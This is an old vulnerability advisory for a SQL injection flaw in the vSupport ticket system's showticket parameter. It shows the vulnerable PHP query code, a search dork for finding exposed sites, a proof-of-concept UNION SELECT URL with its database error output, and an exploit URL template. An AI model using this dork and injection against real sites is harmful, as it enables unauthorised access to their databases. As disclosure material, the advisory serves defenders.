vSupport Integrated Ticket System 3.*.* SQL injection

2007.06.14
Credit: rUnViRuS
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2007-3196
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+-------------------------------------------------------------------- + + Affected Software .: vSupport Integrated Ticket System + Venedor ...........: http://www.cmgsccc.com + Class .............: SQL injection + Dork ..............: inurl:vBSupport.php + Found by ..........: rUnViRuS + Original advisory .: http://www.sec-area.com/ + Contact ...........: stormhacker[at]hotmail[.]com + +-------------------------------------------------------------------- + PoC: + + Database error SQL +-------------------------------------------------------------------- // do not limit the users access $fromuseraccess = ""; } // get the info about the ticket first if ($ticket = $db->query_first(" SELECT ticket.* " . iif($vbulletin->options['privallowicons'], ",icon.title AS icontitle, icon.iconpath") . " FROM " . TABLE_PREFIX . "ticket as ticket " . iif($vbulletin->options['privallowicons'], "LEFT JOIN " . TABLE_PREFIX . "icon AS icon ON(icon.iconid = ticket.iconid)") . " WHERE ticketid=" . $vbulletin->GPC['ticketid'] . " $fromuseraccess ")) { +-------------------------------------------------------------------- + An example: +-------------------------------------------------------------------- http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/se lect/**/ +-------------------------------------------------------------------- + output: +-------------------------------------------------------------------- MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 5 Error Number : 1064 Date : Monday, July 2nd 2007 @ 02:54:54 PM Script : http://localhost/4/vBSupport.php?do=showticket&ticketid=1/**/union/**/se lect/**/ Referrer : IP Address : 127.0.0.1 Username : admin Classname : vb_database Invalid SQL: SELECT ticket.* ,icon.title AS icontitle, icon.iconpath FROM ticket as ticket LEFT JOIN icon AS icon ON(icon.iconid = ticket.iconid) WHERE ticketid=1/**/union/**/select/**/; +-------------------------------------------------------------------- + Exploit : +-------------------------------------------------------------------- http://localhost/4/vBSupport.php?do=showticket&ticketid=[SQL] +-------------------------------------------------------------------- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +-------------------------------------------------------------------- + [W]orld [D]efacers [T]eam + Greets: + || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE || + || Pro Hacker || - || DARKFIRE || + +-------------------------[ W D T ]----------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top